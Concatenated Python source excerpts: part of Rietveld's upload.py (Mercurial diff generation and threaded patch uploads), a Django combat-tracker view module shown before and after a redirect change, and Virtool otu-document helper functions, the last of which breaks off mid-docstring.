# (Passed as the shell= argument of subprocess.Popen below.)
use_shell = sys.platform.startswith("win")
def RunShellWithReturnCode(command, print_output=False,
		universal_newlines=True, env=os.environ):
	"""Executes a command and returns the output from stdout and the return code.

	Args:
		command: Command to execute.
		print_output: If True, stdout is echoed line by line as it arrives
			(and any stderr output is echoed at the end); either way the
			full stdout is collected and returned.
		universal_newlines: Use universal_newlines flag (default: True).

	Returns:
		Tuple (output, return code)
	"""
	logging.info("Running %s", command)
	p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
		shell=use_shell, universal_newlines=universal_newlines, env=env)
	if print_output:
		output_array = []
		while True:
			line = p.stdout.readline()
			if not line:
				break
			print line.strip("\n")
			output_array.append(line)
		output = "".join(output_array)
	else:
		output = p.stdout.read()
	p.wait()
	# NOTE(review): stderr is only drained after stdout is exhausted and
	# the process has exited; a command writing very large amounts to
	# stderr could presumably block on the full pipe — confirm before
	# reusing this for chatty commands.
	errout = p.stderr.read()
	if print_output and errout:
		print >>sys.stderr, errout
	p.stdout.close()
	p.stderr.close()
	return output, p.returncode
def RunShell(command, silent_ok=False, universal_newlines=True,
             print_output=False, env=os.environ):
    """Run *command* and return its stdout, aborting the program on failure.

    Exits via ErrorExit when the command returns a non-zero status, or when
    it produced no output and silent_ok is False.
    """
    output, status = RunShellWithReturnCode(command, print_output,
                                            universal_newlines, env)
    if status:
        ErrorExit("Got error status from %s:\n%s" % (command, output))
    if not (silent_ok or output):
        ErrorExit("No output from %s" % command)
    return output
class VersionControlSystem(object):
    """Abstract base class providing an interface to the VCS."""

    def __init__(self, options):
        """Constructor.

        Args:
          options: Command line options.
        """
        self.options = options

    def GenerateDiff(self, args):
        """Return the current diff as a string.

        Args:
          args: Extra arguments to pass to the diff command.
        """
        raise NotImplementedError(
            "abstract method -- subclass %s must override" % self.__class__)

    def GetUnknownFiles(self):
        """Return a list of files unknown to the VCS."""
        raise NotImplementedError(
            "abstract method -- subclass %s must override" % self.__class__)

    def CheckForUnknownFiles(self):
        """Show an "are you sure?" prompt if there are unknown files."""
        unknown_files = self.GetUnknownFiles()
        if unknown_files:
            print "The following files are not added to version control:"
            for line in unknown_files:
                print line
            prompt = "Are you sure to continue?(y/N) "
            answer = raw_input(prompt).strip()
            if answer != "y":
                ErrorExit("User aborted")

    def GetBaseFile(self, filename):
        """Get the content of the upstream version of a file.

        Returns:
          A tuple (base_content, new_content, is_binary, status)
            base_content: The contents of the base file.
            new_content: For text files, this is empty.  For binary files, this is
              the contents of the new file, since the diff output won't contain
              information to reconstruct the current file.
            is_binary: True iff the file is binary.
            status: The status of the file.
        """
        raise NotImplementedError(
            "abstract method -- subclass %s must override" % self.__class__)

    def GetBaseFiles(self, diff):
        """Helper that calls GetBase file for each file in the patch.

        Returns:
          A dictionary that maps from filename to GetBaseFile's tuple.  Filenames
          are retrieved based on lines that start with "Index:" or
          "Property changes on:".
        """
        files = {}
        for line in diff.splitlines(True):
            if line.startswith('Index:') or line.startswith('Property changes on:'):
                unused, filename = line.split(':', 1)
                # On Windows if a file has property changes its filename uses '\'
                # instead of '/'.
                filename = filename.strip().replace('\\', '/')
                files[filename] = self.GetBaseFile(filename)
        return files

    def UploadBaseFiles(self, issue, rpc_server, patch_list, patchset, options,
                        files):
        """Uploads the base files (and if necessary, the current ones as well)."""

        def UploadFile(filename, file_id, content, is_binary, status, is_base):
            """Uploads a file to the server."""
            set_status("uploading " + filename)
            file_too_large = False
            if is_base:
                type = "base"
            else:
                type = "current"
            # Oversized files are registered with an empty body and a marker
            # field instead of being uploaded.
            if len(content) > MAX_UPLOAD_SIZE:
                print ("Not uploading the %s file for %s because it's too large." %
                       (type, filename))
                file_too_large = True
                content = ""
            checksum = md5(content).hexdigest()
            if options.verbose > 0 and not file_too_large:
                print "Uploading %s file for %s" % (type, filename)
            url = "/%d/upload_content/%d/%d" % (int(issue), int(patchset), file_id)
            form_fields = [
                ("filename", filename),
                ("status", status),
                ("checksum", checksum),
                ("is_binary", str(is_binary)),
                ("is_current", str(not is_base)),
            ]
            if file_too_large:
                form_fields.append(("file_too_large", "1"))
            if options.email:
                form_fields.append(("user", options.email))
            ctype, body = EncodeMultipartFormData(form_fields, [("data", filename, content)])
            response_body = rpc_server.Send(url, body, content_type=ctype)
            if not response_body.startswith("OK"):
                StatusUpdate(" --> %s" % response_body)
                sys.exit(1)

        # Don't want to spawn too many threads, nor do we want to
        # hit Rietveld too hard, or it will start serving 500 errors.
        # When 8 works, it's no better than 4, and sometimes 8 is
        # too many for Rietveld to handle.
        MAX_PARALLEL_UPLOADS = 4

        sema = threading.BoundedSemaphore(MAX_PARALLEL_UPLOADS)
        upload_threads = []
        finished_upload_threads = []

        class UploadFileThread(threading.Thread):
            # Worker thread: runs one upload, then records itself as finished
            # and releases its semaphore slot.
            def __init__(self, args):
                threading.Thread.__init__(self)
                self.args = args
            def run(self):
                UploadFile(*self.args)
                finished_upload_threads.append(self)
                sema.release()

        def StartUploadFile(*args):
            # Blocks until a semaphore slot is free, reaps finished threads,
            # then starts a new upload thread.
            sema.acquire()
            while len(finished_upload_threads) > 0:
                t = finished_upload_threads.pop()
                upload_threads.remove(t)
                t.join()
            t = UploadFileThread(args)
            upload_threads.append(t)
            t.start()

        def WaitForUploads():
            for t in upload_threads:
                t.join()

        # Build a filename -> patch id mapping (side-effect comprehension;
        # setdefault keeps the first id if a filename repeats).
        patches = dict()
        [patches.setdefault(v, k) for k, v in patch_list]
        for filename in patches.keys():
            base_content, new_content, is_binary, status = files[filename]
            file_id_str = patches.get(filename)
            # A "nobase" marker in the patch id means the base file should
            # not be uploaded; the numeric id follows the last underscore.
            if file_id_str.find("nobase") != -1:
                base_content = None
                file_id_str = file_id_str[file_id_str.rfind("_") + 1:]
            file_id = int(file_id_str)
            if base_content != None:
                StartUploadFile(filename, file_id, base_content, is_binary, status, True)
            if new_content != None:
                StartUploadFile(filename, file_id, new_content, is_binary, status, False)
        WaitForUploads()

    def IsImage(self, filename):
        """Returns true if the filename has an image extension."""
        mimetype = mimetypes.guess_type(filename)[0]
        if not mimetype:
            return False
        return mimetype.startswith("image/")

    def IsBinary(self, filename):
        """Returns true if the guessed mimetype isn't in the text group."""
        mimetype = mimetypes.guess_type(filename)[0]
        if not mimetype:
            return False  # e.g. README, "real" binaries usually have an extension
        # special case for text files which don't start with text/
        if mimetype in TEXT_MIMETYPES:
            return False
        return not mimetype.startswith("text/")
class FakeMercurialUI(object):
    """Minimal stand-in for Mercurial's ui object that buffers all writes."""

    def __init__(self):
        self.quiet = True
        # Everything written through write() accumulates here.
        self.output = ''

    def write(self, *args, **opts):
        """Append the space-joined positional arguments to the buffer."""
        self.output = self.output + ' '.join(args)
use_hg_shell = False # set to True to shell out to hg always; slower
class MercurialVCS(VersionControlSystem):
    """Implementation of the VersionControlSystem interface for Mercurial."""

    def __init__(self, options, ui, repo):
        super(MercurialVCS, self).__init__(options)
        self.ui = ui
        self.repo = repo
        # Absolute path to repository (we can be in a subdir)
        self.repo_dir = os.path.normpath(repo.root)
        # Compute the subdir
        cwd = os.path.normpath(os.getcwd())
        assert cwd.startswith(self.repo_dir)
        self.subdir = cwd[len(self.repo_dir):].lstrip(r"\/")
        if self.options.revision:
            self.base_rev = self.options.revision
        else:
            # Prefer the parent of the applied MQ patch queue; otherwise fall
            # back to the working directory's parent revision.
            mqparent, err = RunShellWithReturnCode(['hg', 'log', '--rev', 'qparent', '--template={node}'])
            if not err and mqparent != "":
                self.base_rev = mqparent
            else:
                self.base_rev = RunShell(["hg", "parents", "-q"]).split(':')[1].strip()

    def _GetRelPath(self, filename):
        """Get relative path of a file according to the current directory,
        given its logical path in the repo."""
        assert filename.startswith(self.subdir), (filename, self.subdir)
        return filename[len(self.subdir):].lstrip(r"\/")

    def GenerateDiff(self, extra_args):
        """Return an svn-style diff of the working copy against base_rev."""
        # If no file specified, restrict to the current subdir
        extra_args = extra_args or ["."]
        cmd = ["hg", "diff", "--git", "-r", self.base_rev] + extra_args
        data = RunShell(cmd, silent_ok=True)
        svndiff = []
        filecount = 0
        for line in data.splitlines():
            m = re.match("diff --git a/(\S+) b/(\S+)", line)
            if m:
                # Modify line to make it look like as it comes from svn diff.
                # With this modification no changes on the server side are required
                # to make upload.py work with Mercurial repos.
                # NOTE: for proper handling of moved/copied files, we have to use
                # the second filename.
                filename = m.group(2)
                svndiff.append("Index: %s" % filename)
                svndiff.append("=" * 67)
                filecount += 1
                logging.info(line)
            else:
                svndiff.append(line)
        if not filecount:
            ErrorExit("No valid patches found in output from hg diff")
        return "\n".join(svndiff) + "\n"

    def GetUnknownFiles(self):
        """Return a list of files unknown to the VCS."""
        args = []
        status = RunShell(["hg", "status", "--rev", self.base_rev, "-u", "."],
                          silent_ok=True)
        unknown_files = []
        for line in status.splitlines():
            # "hg status" lines look like "? path" for unknown files.
            st, fn = line.split(" ", 1)
            if st == "?":
                unknown_files.append(fn)
        return unknown_files

    def GetBaseFile(self, filename):
        """Return (base_content, new_content, is_binary, status) for filename."""
        set_status("inspecting " + filename)
        # "hg status" and "hg cat" both take a path relative to the current subdir
        # rather than to the repo root, but "hg diff" has given us the full path
        # to the repo root.
        base_content = ""
        new_content = None
        is_binary = False
        oldrelpath = relpath = self._GetRelPath(filename)
        # "hg status -C" returns two lines for moved/copied files, one otherwise
        if use_hg_shell:
            out = RunShell(["hg", "status", "-C", "--rev", self.base_rev, relpath])
        else:
            fui = FakeMercurialUI()
            ret = commands.status(fui, self.repo, *[relpath], **{'rev': [self.base_rev], 'copies': True})
            if ret:
                raise util.Abort(ret)
            out = fui.output
        out = out.splitlines()
        # HACK: strip error message about missing file/directory if it isn't in
        # the working copy
        if out[0].startswith('%s: ' % relpath):
            out = out[1:]
        status, what = out[0].split(' ', 1)
        if len(out) > 1 and status == "A" and what == relpath:
            # Moved/copied file: treat it as modified and read the base
            # content from the old path on the second status line.
            oldrelpath = out[1].strip()
            status = "M"
        if ":" in self.base_rev:
            base_rev = self.base_rev.split(":", 1)[0]
        else:
            base_rev = self.base_rev
        if status != "A":
            if use_hg_shell:
                base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath], silent_ok=True)
            else:
                base_content = str(self.repo[base_rev][oldrelpath].data())
            is_binary = "\0" in base_content  # Mercurial's heuristic
        if status != "R":
            new_content = open(relpath, "rb").read()
            is_binary = is_binary or "\0" in new_content
        if is_binary and base_content and use_hg_shell:
            # Fetch again without converting newlines
            base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
                                    silent_ok=True, universal_newlines=False)
        # Only keep new_content for binary images; text diffs carry the rest.
        if not is_binary or not self.IsImage(relpath):
            new_content = None
        return base_content, new_content, is_binary, status
# NOTE: The SplitPatch function is duplicated in engine.py, keep them in sync.
def SplitPatch(data):
    """Splits a patch into separate pieces for each file.

    Args:
      data: A string containing the output of svn diff.

    Returns:
      A list of 2-tuple (filename, text) where text is the svn diff output
      pertaining to filename.
    """
    patches = []
    current_filename = None
    current_diff = []

    for line in data.splitlines(True):
        found_filename = None

        if line.startswith('Index:'):
            found_filename = line.split(':', 1)[1].strip()
        elif line.startswith('Property changes on:'):
            # When a file is modified, paths use '/' between directories, but
            # property changes use '\' on Windows. Normalize so the same file
            # doesn't show up twice.
            candidate = line.split(':', 1)[1].strip().replace('\\', '/')
            if candidate != current_filename:
                # File has property changes but no modifications: new diff.
                found_filename = candidate

        if found_filename:
            # Flush the accumulated diff before starting the next file.
            if current_filename and current_diff:
                patches.append((current_filename, ''.join(current_diff)))
            current_filename = found_filename
            current_diff = [line]
            continue

        current_diff.append(line)

    if current_filename and current_diff:
        patches.append((current_filename, ''.join(current_diff)))

    return patches
def UploadSeparatePatches(issue, rpc_server, patchset, data, options):
    """Uploads a separate patch for each file in the diff output.

    Returns a list of [patch_key, filename] for each file.
    """
    patches = SplitPatch(data)
    rv = []
    for patch in patches:
        set_status("uploading patch for " + patch[0])
        # Oversized per-file patches are skipped entirely.
        if len(patch[1]) > MAX_UPLOAD_SIZE:
            print ("Not uploading the patch for " + patch[0] +
                   " because the file is too large.")
            continue
        form_fields = [("filename", patch[0])]
        if not options.download_base:
            form_fields.append(("content_upload", "1"))
        files = [("data", "data.diff", patch[1])]
        ctype, body = EncodeMultipartFormData(form_fields, files)
        url = "/%d/upload_patch/%d" % (int(issue), int(patchset))
        print "Uploading patch for " + patch[0]
        response_body = rpc_server.Send(url, body, content_type=ctype)
        lines = response_body.splitlines()
        # The server replies "OK" on the first line and the patch key on the
        # second; anything else is treated as a fatal error.
        if not lines or lines[0] != "OK":
            StatusUpdate(" --> %s" % response_body)
            sys.exit(1)
        rv.append([lines[1], patch[0]])
    return rv
|
from django.shortcuts import render, get_object_or_404, redirect
from django.views.generic import DetailView, ListView, UpdateView, CreateView, DeleteView
from django.contrib.auth.mixins import LoginRequiredMixin
from django.template import loader
from seraphim.characters.models import Character
from .models import Combat, StatusEffect, Wound, Heal
from .forms import WoundForm, HealForm
# Create your views here.
def index(request):
    """Render the combat index, split into in-progress and completed combats."""
    context = {
        'combat_list_in_progress': Combat.objects.filter(in_progress=True),
        'combat_list_complete': Combat.objects.filter(in_progress=False),
    }
    return render(request, 'tracker/index.html', context)
def manage_combat(request, pk):
    """Render the management page for a single combat, or 404 if missing."""
    combat = get_object_or_404(Combat, pk=pk)
    context = {
        'combat': combat,
        'combat_state': combat_state(combat),
    }
    return render(request, 'tracker/manage_combat.html', context)
def character_detail(request, combat_pk, character_pk):
    """Render the detail page for one character within a combat."""
    combat = get_object_or_404(Combat, pk=combat_pk)
    character = get_object_or_404(Character, pk=character_pk)

    current_hp, max_hp, total_h = character_state(combat, character)

    # Both forms are pre-bound with the character/combat pair and a zero amount.
    form_data = {
        'character': character,
        'combat': combat,
        'amount': 0,
    }

    context = {
        'combat': combat,
        'character': character,
        'current_hp': current_hp,
        'max_hp': max_hp,
        'damage': max_hp.hp - current_hp.hp,
        'total_h': total_h,
        'woundform': WoundForm(dict(form_data)),
        'healform': HealForm(dict(form_data)),
    }

    return render(request, 'tracker/character_detail.html', context)
# def manage_wound(request, combat_pk, character_pk):
# context = {}
# combat = get_object_or_404(Combat, pk=combat_pk)
# character = get_object_or_404(Character, pk=character_pk)
# current_hp, max_hp, total_h = character_state(combat, character)
# context['combat'] = combat
# context['character'] = character
# context['current_hp'] = current_hp
# context['max_hp'] = max_hp
# context['damage'] = max_hp.hp - current_hp.hp
# context['total_h'] = total_h
# return render(request, 'tracker/character_wounds.html', context)
def add_wound(request, combat_pk, character_pk):
    """Save a wound from a POSTed WoundForm, then show the character detail.

    GET requests and invalid forms fall through without saving. The final
    return is unconditional so the view always produces an HttpResponse:
    the original returned None for non-POST requests, which makes Django
    raise a ValueError.
    """
    if request.method == 'POST':
        form = WoundForm(request.POST)
        if form.is_valid():
            form.save()
    return character_detail(request, combat_pk, character_pk)
def add_heal(request, combat_pk, character_pk):
    """Save a heal from a POSTed HealForm, then show the character detail.

    GET requests and invalid forms fall through without saving. The final
    return is unconditional so the view always produces an HttpResponse:
    the original returned None for non-POST requests, which makes Django
    raise a ValueError.
    """
    if request.method == 'POST':
        form = HealForm(request.POST)
        if form.is_valid():
            form.save()
    return character_detail(request, combat_pk, character_pk)
# Pre-calculate some information to pass along to our templates
def combat_state(combat):
    """
    Get the current state of each combatant in the group. Returns a list of
    (Character, current_hp, max_hp, total_h) tuples.
    """
    state = [
        (character,) + character_state(combat, character)
        for character in combat.game_day.group.members.all()
    ]

    # Sort by the secondary key first: Python's sort is stable, so after the
    # second sort, level acts as the tie-breaker within equal damage.
    state.sort(key=lambda entry: entry[0].level, reverse=True)
    state.sort(key=lambda entry: entry[1].max_hp - entry[1].hp, reverse=True)

    return state
def character_state(combat, character):
    """
    Get the combat status of a single character, as a tuple of
    (current_hp, max_hp, total healing).
    """
    max_hp = Max_hp(character.base_hp)

    # MAX_HP status effects shift the effective maximum up or down.
    for effect in StatusEffect.objects.filter(
            character=character, combat=combat, effect_typ__typ='MAX_HP'):
        max_hp.hp += effect.effect_val

    current_hp = Current_hp(max_hp.hp)

    for wound in Wound.objects.filter(character=character, combat=combat):
        current_hp.hp -= wound.amount

    total_h = 0
    for heal in Heal.objects.filter(character=character, combat=combat):
        current_hp.hp += heal.amount
        total_h += heal.amount

    return current_hp, max_hp, total_h
class Max_hp:
    """Mutable maximum-HP value that remembers the character's base HP."""

    def __init__(self, hp):
        self.hp = hp        # effective max HP (mutated by status effects)
        self.base_hp = hp   # unmodified base value, kept for comparison

    def __str__(self):
        return str(self.hp)

    def style(self):
        """Return Bootstrap text classes reflecting buffs/debuffs to max HP."""
        classes = "font-weight-light"
        if self.hp > self.base_hp:
            classes += " text-success"
        elif self.hp < self.base_hp:
            classes += " text-muted"
        return classes
class Current_hp:
    """Mutable current-HP value that remembers the total it started from."""

    def __init__(self, hp):
        self.hp = hp        # current HP (mutated by wounds/heals)
        self.max_hp = hp    # the maximum at construction time

    def __str__(self):
        return str(self.hp)

    def style(self):
        """Return Bootstrap text classes for the current HP percentage."""
        classes = "font-weight-bold"
        pct = self.hp / self.max_hp
        if pct >= 0.99:
            classes += " "
        elif pct >= 0.90:
            # NOTE(review): this band drops the bold class entirely --
            # presumably intentional styling, but worth confirming.
            classes = ""
        elif pct >= 0.66:
            classes += " text-success"
        elif pct >= 0.33:
            classes += " text-warning"
        elif pct > 0.00:
            classes += " text-danger"
        else:
            classes += " text-muted"
        return classes
change redirects
from django.shortcuts import render, get_object_or_404, redirect
from django.views.generic import DetailView, ListView, UpdateView, CreateView, DeleteView
from django.contrib.auth.mixins import LoginRequiredMixin
from django.template import loader
from seraphim.characters.models import Character
from .models import Combat, StatusEffect, Wound, Heal
from .forms import WoundForm, HealForm
# Create your views here.
def index(request):
    """Render the combat index, split into in-progress and completed combats."""
    context = {
        'combat_list_in_progress': Combat.objects.filter(in_progress=True),
        'combat_list_complete': Combat.objects.filter(in_progress=False),
    }
    return render(request, 'tracker/index.html', context)
def manage_combat(request, pk):
    """Render the management page for a single combat, or 404 if missing."""
    combat = get_object_or_404(Combat, pk=pk)
    context = {
        'combat': combat,
        'combat_state': combat_state(combat),
    }
    return render(request, 'tracker/manage_combat.html', context)
def character_detail(request, combat_pk, character_pk):
    """Render the detail page for one character within a combat."""
    combat = get_object_or_404(Combat, pk=combat_pk)
    character = get_object_or_404(Character, pk=character_pk)

    current_hp, max_hp, total_h = character_state(combat, character)

    # Both forms are pre-bound with the character/combat pair and a zero amount.
    form_data = {
        'character': character,
        'combat': combat,
        'amount': 0,
    }

    context = {
        'combat': combat,
        'character': character,
        'current_hp': current_hp,
        'max_hp': max_hp,
        'damage': max_hp.hp - current_hp.hp,
        'total_h': total_h,
        'woundform': WoundForm(dict(form_data)),
        'healform': HealForm(dict(form_data)),
    }

    return render(request, 'tracker/character_detail.html', context)
# def manage_wound(request, combat_pk, character_pk):
# context = {}
# combat = get_object_or_404(Combat, pk=combat_pk)
# character = get_object_or_404(Character, pk=character_pk)
# current_hp, max_hp, total_h = character_state(combat, character)
# context['combat'] = combat
# context['character'] = character
# context['current_hp'] = current_hp
# context['max_hp'] = max_hp
# context['damage'] = max_hp.hp - current_hp.hp
# context['total_h'] = total_h
# return render(request, 'tracker/character_wounds.html', context)
def add_wound(request, combat_pk, character_pk):
    """Save a wound from a POSTed WoundForm, then show the combat page.

    GET requests and invalid forms fall through without saving. The final
    return is unconditional so the view always produces an HttpResponse:
    the original returned None for non-POST requests, which makes Django
    raise a ValueError.
    """
    if request.method == 'POST':
        form = WoundForm(request.POST)
        if form.is_valid():
            form.save()
    return manage_combat(request, combat_pk)
def add_heal(request, combat_pk, character_pk):
    """Save a heal from a POSTed HealForm, then show the combat page.

    GET requests and invalid forms fall through without saving. The final
    return is unconditional so the view always produces an HttpResponse:
    the original returned None for non-POST requests, which makes Django
    raise a ValueError.
    """
    if request.method == 'POST':
        form = HealForm(request.POST)
        if form.is_valid():
            form.save()
    return manage_combat(request, combat_pk)
# Pre-calculate some information to pass along to our templates
def combat_state(combat):
    """
    Get the current state of each combatant in the group. Returns a list of
    (Character, current_hp, max_hp, total_h) tuples.
    """
    state = [
        (character,) + character_state(combat, character)
        for character in combat.game_day.group.members.all()
    ]

    # Sort by the secondary key first: Python's sort is stable, so after the
    # second sort, level acts as the tie-breaker within equal damage.
    state.sort(key=lambda entry: entry[0].level, reverse=True)
    state.sort(key=lambda entry: entry[1].max_hp - entry[1].hp, reverse=True)

    return state
def character_state(combat, character):
    """
    Get the combat status of a single character, as a tuple of
    (current_hp, max_hp, total healing).
    """
    max_hp = Max_hp(character.base_hp)

    # MAX_HP status effects shift the effective maximum up or down.
    for effect in StatusEffect.objects.filter(
            character=character, combat=combat, effect_typ__typ='MAX_HP'):
        max_hp.hp += effect.effect_val

    current_hp = Current_hp(max_hp.hp)

    for wound in Wound.objects.filter(character=character, combat=combat):
        current_hp.hp -= wound.amount

    total_h = 0
    for heal in Heal.objects.filter(character=character, combat=combat):
        current_hp.hp += heal.amount
        total_h += heal.amount

    return current_hp, max_hp, total_h
class Max_hp:
    """Mutable maximum-HP value that remembers the character's base HP."""

    def __init__(self, hp):
        self.hp = hp        # effective max HP (mutated by status effects)
        self.base_hp = hp   # unmodified base value, kept for comparison

    def __str__(self):
        return str(self.hp)

    def style(self):
        """Return Bootstrap text classes reflecting buffs/debuffs to max HP."""
        classes = "font-weight-light"
        if self.hp > self.base_hp:
            classes += " text-success"
        elif self.hp < self.base_hp:
            classes += " text-muted"
        return classes
class Current_hp:
    """Mutable current-HP value that remembers the total it started from."""

    def __init__(self, hp):
        self.hp = hp        # current HP (mutated by wounds/heals)
        self.max_hp = hp    # the maximum at construction time

    def __str__(self):
        return str(self.hp)

    def style(self):
        """Return Bootstrap text classes for the current HP percentage."""
        classes = "font-weight-bold"
        pct = self.hp / self.max_hp
        if pct >= 0.99:
            classes += " "
        elif pct >= 0.90:
            # NOTE(review): this band drops the bold class entirely --
            # presumably intentional styling, but worth confirming.
            classes = ""
        elif pct >= 0.66:
            classes += " text-success"
        elif pct >= 0.33:
            classes += " text-warning"
        elif pct > 0.00:
            classes += " text-danger"
        else:
            classes += " text-muted"
        return classes
|
"""
Functions for working with otu documents.
"""
import logging
from copy import deepcopy
import virtool.errors
import virtool.history
import virtool.utils
logger = logging.getLogger(__name__)
def evaluate_changes(data, document):
    """Compare an update payload against an existing otu document.

    Returns a (name, abbreviation, schema) tuple where each entry is the
    submitted value when it differs from the stored document, or ``None``
    when it is absent or unchanged.
    """
    name = data.get("name")
    abbreviation = data.get("abbreviation")
    schema = data.get("schema")

    if name == document["name"]:
        name = None

    # Documents with no abbreviation are treated as having an empty one.
    if abbreviation == document.get("abbreviation", ""):
        abbreviation = None

    if schema == document.get("schema"):
        schema = None

    return name, abbreviation, schema
def extract_default_isolate(otu, isolate_processor=None):
    """
    Returns the default isolate dict for the given otu document.

    :param otu: a otu document.
    :type otu: dict
    :param isolate_processor: a function to process the default isolate into a desired format.
    :type: func
    :return: the default isolate dict.
    :rtype: dict
    :raises ValueError: if zero or more than one default isolate is found.
    """
    # Exactly one isolate should carry the default flag.
    defaults = [i for i in otu["isolates"] if i["default"] is True]

    if len(defaults) > 1:
        raise ValueError("More than one default isolate found")

    if not defaults:
        raise ValueError("No default isolate found")

    isolate = defaults[0]

    if isolate_processor is not None:
        isolate = isolate_processor(isolate)

    return isolate
def extract_default_sequences(joined):
    """
    Return a list of sequences from the default isolate of the passed joined otu document.

    Returns ``None`` when no isolate is flagged as default.

    :param joined: the joined otu document.
    :type joined: dict
    :return: a list of sequences associated with the default isolate.
    :rtype: list
    """
    return next(
        (isolate["sequences"] for isolate in joined["isolates"] if isolate["default"]),
        None
    )
def extract_isolate_ids(otu):
    """
    Get the isolate ids from a otu document.

    :param otu: a otu document.
    :return: a list of isolate ids.
    """
    ids = []

    for isolate in otu["isolates"]:
        ids.append(isolate["id"])

    return ids
def extract_sequence_ids(otu):
    """
    Extract all sequence ids from a merged otu.

    :param otu: the merged otu
    :type otu: dict
    :return: the sequence ids belonging to ``otu``
    :rtype: list
    :raises ValueError: if the isolate list or any sequence list is empty.
    :raises KeyError: if an isolate is missing its ``sequences`` field.
    """
    isolates = otu["isolates"]

    if not isolates:
        raise ValueError("Empty isolates list in merged otu")

    sequence_ids = []

    for isolate in isolates:
        try:
            sequences = isolate["sequences"]
        except KeyError:
            raise KeyError("Isolate in merged otu missing sequences field")

        if not sequences:
            raise ValueError("Empty sequences list in merged otu")

        sequence_ids.extend(sequence["_id"] for sequence in sequences)

    return sequence_ids
def find_isolate(isolates, isolate_id):
    """
    Return the isolate identified by ``isolate_id`` from a list of isolates.

    :param isolates: a list of isolate dicts
    :type isolates: list
    :param isolate_id: the isolate_id of the isolate to return
    :type isolate_id: str
    :return: an isolate, or ``None`` when no id matches
    :rtype: dict
    """
    for isolate in isolates:
        if isolate["id"] == isolate_id:
            return isolate

    return None
def format_otu(joined, issues=False, most_recent_change=None):
    """
    Format a joined otu document so it can be returned directly to API clients.

    :param joined: the joined otu document
    :type joined: Union[dict, NoneType]
    :param issues: an object describing issues in the otu; ``False`` triggers
        a fresh verification
    :type issues: Union[dict, NoneType, bool]
    :param most_recent_change: a change document for the most recent change made to OTU
    :type most_recent_change: dict
    :return: a joined and formatted otu
    :rtype: dict
    """
    formatted = virtool.utils.base_processor(joined)

    del formatted["lower_name"]

    # Strip internal fields from each sequence and expose "_id" as "id".
    for isolate in formatted["isolates"]:
        for sequence in isolate["sequences"]:
            sequence["id"] = sequence.pop("_id")
            del sequence["otu_id"]
            del sequence["isolate_id"]

    if most_recent_change:
        formatted["most_recent_change"] = virtool.utils.base_processor(most_recent_change)
    else:
        formatted["most_recent_change"] = None

    formatted["issues"] = verify(joined) if issues is False else issues

    return formatted
def format_isolate_name(isolate):
    """
    Take a complete or partial isolate ``dict`` and return a readable isolate name.

    :param isolate: a complete or partial isolate ``dict`` containing ``source_type`` and ``source_name`` fields.
    :type isolate: dict
    :return: an isolate name
    :rtype: str
    """
    source_type = isolate["source_type"]
    source_name = isolate["source_name"]

    if source_type and source_name:
        return "{} {}".format(source_type.capitalize(), source_name)

    # Either field missing or empty: the isolate cannot be named.
    return "Unnamed Isolate"
def merge_otu(otu, sequences):
    """
    Merge the given sequences in the given otu document. The otu will gain a
    ``sequences`` field on each isolate containing its associated sequence documents.

    :param otu: a otu document.
    :type otu: dict
    :param sequences: the sequence documents to merge into the otu.
    :type sequences: list
    :return: the merged otu (the input is not modified).
    :rtype: dict
    """
    merged = deepcopy(otu)

    for isolate in merged["isolates"]:
        isolate["sequences"] = [
            sequence for sequence in sequences
            if sequence["isolate_id"] == isolate["id"]
        ]

    return merged
def split(merged):
    """
    Split a merged otu document into a list of sequence documents associated
    with the otu and a regular otu document containing no sequence sub-documents.

    :param merged: the merged otu to split
    :type merged: dict
    :return: a tuple containing the new otu document and a list of sequence documents
    :type: tuple
    """
    otu = deepcopy(merged)

    sequences = []

    # Pop the sequences off each isolate of the copy; the input is untouched.
    for isolate in otu["isolates"]:
        sequences.extend(isolate.pop("sequences"))

    return otu, sequences
def verify(joined):
    """
    Checks that the passed otu and sequences constitute valid Virtool records
    and can be included in a otu index. Error fields are:

    * empty_otu - otu has no isolates associated with it.
    * empty_isolate - isolates that have no sequences associated with them.
    * empty_sequence - sequences that have a zero length sequence field.
    * isolate_inconsistency - otu has isolates containing different numbers of sequences.

    :param joined: a joined otu
    :type joined: dict
    :return: a dict of errors, or ``None`` if there are no errors.
    :rtype: Union[dict, None]
    """
    errors = {
        "empty_otu": len(joined["isolates"]) == 0,
        "empty_isolate": [],
        "empty_sequence": [],
        "isolate_inconsistency": False
    }

    sequence_counts = []

    for isolate in joined["isolates"]:
        sequences = isolate["sequences"]

        # Isolates with no sequences are recorded by id.
        if not sequences:
            errors["empty_isolate"].append(isolate["id"])

        sequence_counts.append(len(sequences))

        # Sequences with a zero-length sequence field are recorded whole.
        errors["empty_sequence"] += [s for s in sequences if len(s["sequence"]) == 0]

    # Inconsistent only when isolates have differing sequence counts AND the
    # otu is not already flagged as empty at the otu or isolate level.
    errors["isolate_inconsistency"] = (
        len(set(sequence_counts)) != 1 and not
        (errors["empty_otu"] or errors["empty_isolate"])
    )

    # Normalize: falsy entries become False; remember whether anything fired.
    has_errors = False

    for key, value in errors.items():
        if value:
            has_errors = True
        else:
            errors[key] = False

    return errors if has_errors else None
Fix conditional formatting
"""
Functions for working with otu documents.
"""
import logging
from copy import deepcopy
import virtool.errors
import virtool.history
import virtool.utils
logger = logging.getLogger(__name__)
def evaluate_changes(data, document):
    """Compare an update payload against an existing otu document.

    Returns a (name, abbreviation, schema) tuple where each entry is the
    submitted value when it differs from the stored document, or ``None``
    when it is absent or unchanged.
    """
    name = data.get("name")
    abbreviation = data.get("abbreviation")
    schema = data.get("schema")

    if name == document["name"]:
        name = None

    # Documents with no abbreviation are treated as having an empty one.
    if abbreviation == document.get("abbreviation", ""):
        abbreviation = None

    if schema == document.get("schema"):
        schema = None

    return name, abbreviation, schema
def extract_default_isolate(otu, isolate_processor=None):
    """
    Returns the default isolate dict for the given otu document.

    :param otu: a otu document.
    :type otu: dict
    :param isolate_processor: a function to process the default isolate into a desired format.
    :type: func
    :return: the default isolate dict.
    :rtype: dict
    :raises ValueError: if zero or more than one default isolate is found.
    """
    # Exactly one isolate should carry the default flag.
    defaults = [i for i in otu["isolates"] if i["default"] is True]

    if len(defaults) > 1:
        raise ValueError("More than one default isolate found")

    if not defaults:
        raise ValueError("No default isolate found")

    isolate = defaults[0]

    if isolate_processor is not None:
        isolate = isolate_processor(isolate)

    return isolate
def extract_default_sequences(joined):
    """
    Return a list of sequences from the default isolate of the passed joined otu document.

